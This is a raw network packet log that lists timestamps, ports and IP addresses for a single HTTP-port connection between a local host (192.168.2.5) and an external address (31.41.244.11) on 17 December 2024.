Dec 17, 2024 06:03:19.356182098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.356201887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.356213093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.357258081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.357304096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.357361078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.357392073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.358356953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.358397007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.358469963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.358509064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.359460115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.359498024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.359556913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.359596968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.360635996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.360673904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.360707045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.360750914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.361820936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.361865044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.361895084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.361942053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.362829924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.362867117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.362884998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.362921000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.363909960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.363955975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.364005089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.364128113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.365035057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.365077019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.365092039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.365129948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.366202116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.366251945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.366281033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.366314888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.367247105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.367289066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.367372036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.367409945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.368383884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.368422985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.368474007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.368510008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.369482994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.369528055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.369622946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.369659901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.370596886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.370636940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.370707989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.370743036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.505642891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.505695105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.505795956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.505842924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.506150007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.506190062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.506269932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.506318092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.507257938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.507301092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.507352114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.507395983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.508371115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.508414030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.508479118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.508524895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.509491920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.509536028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.509589911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.509625912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.510591984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.510633945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.510694027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.510739088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.511708021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.511753082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.511874914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.511913061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.512841940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.512887001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.512940884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.512974024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.513981104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.514025927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.514086008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.514123917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.515130997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.515186071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.515202999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.515239954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.516187906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.516228914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.516289949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.516328096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.517291069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.517332077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.517412901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.517452955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.518440008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.518481016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.518553019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.518596888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.519519091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.519561052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.519613028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.519658089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.520617962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.520659924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.520709038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.520752907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.521742105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.521783113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.521858931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.521903992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.522860050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.522902012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.523025990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.523066044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.523953915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.523994923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.524058104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.524102926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.525082111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.525124073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.525275946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.525321960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.526204109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.526304960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.526314974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.526338100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.527311087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.527390003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.527415991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.527455091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.528424025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.528508902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.528552055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.529556036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.529624939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.529654980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.529697895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.530656099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.530699968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.530776024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.530816078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.531748056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.531821966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.531877995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.531913996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.532871962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.532957077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.532985926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.533030987 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.534015894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.534085035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.534097910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.534120083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.535095930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.535202026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.535228968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.535267115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.536288977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.536366940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.536371946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.536400080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.537334919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.537401915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.537439108 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.538455963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.538532972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.538541079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.538567066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.539551020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.539657116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.539675951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.539685965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.540713072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.540791035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.540797949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.540826082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.541795969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.541866064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.541923046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.541968107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.542897940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.542951107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.543009043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.543051004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.544027090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.544070005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.544159889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.544203997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.545120001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.545188904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.545319080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.545378923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.546268940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.546310902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.546370029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.546413898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.547357082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.547400951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.547449112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.547517061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.548561096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.548576117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.548657894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.549592018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.549637079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.549669981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.549714088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.550700903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.550796986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.550827026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.550879955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.551811934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.551856995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.551934004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.551975012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.552932024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.552975893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.553026915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.553071976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.554047108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.554090977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.554233074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.554277897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.555151939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.555191994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.555310965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.555356979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.556330919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.556370974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.556394100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.556428909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.557375908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.557418108 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.557480097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.557581902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.558522940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.558563948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.558572054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.558640003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.559628010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.559695959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.559705019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.559760094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.560723066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.560769081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.560832024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.560873032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.561834097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.561872959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.562064886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.562107086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.562932968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.562979937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.563031912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.563204050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.564037085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.564090967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.697721004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.697774887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.697776079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.697846889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.698219061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.698261976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.698407888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.698447943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.699297905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.699342012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.699414968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.699507952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.700412989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.700453997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.700525999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.700567961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.701525927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.701570988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.701642036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.701680899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.702655077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.702694893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.702747107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.702786922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.703763008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.703808069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.703876019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.703915119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.704879999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.704921961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.704989910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.705034971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.705990076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.706046104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.706147909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.706187963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.707113028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.707154036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.707238913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.707278967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.708220005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.708261967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.708329916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.708369017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.709322929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.709362984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.709455967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.709494114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.710437059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.710478067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.710546017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.710585117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.711554050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.711595058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.711668968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.711710930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.712671995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.712713957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.712785959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.712825060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.713794947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.713835955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.713907003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.713948011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.714905024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.714941025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.715033054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.716053009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.716094971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.716130972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.717190027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.717231989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.717317104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.717358112 CET	49850	80	192.168.2.5	31.41.244.11
